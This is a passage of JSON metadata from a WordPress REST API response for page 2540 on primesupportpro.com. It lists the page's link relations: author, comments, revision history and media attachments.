comment_info":0,"uagb_excerpt":null,"_links":{"self":[{"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/pages\/2540"}],"collection":[{"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/comments?post=2540"}],"version-history":[{"count":18,"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/pages\/2540\/revisions"}],"predecessor-version":[{"id":4737,"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/pages\/2540\/revisions\/4737"}],"wp:attachment":[{"href":"https:\/\/www.primesupportpro.com\/wp-json\/wp\/v2\/media?parent=2540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}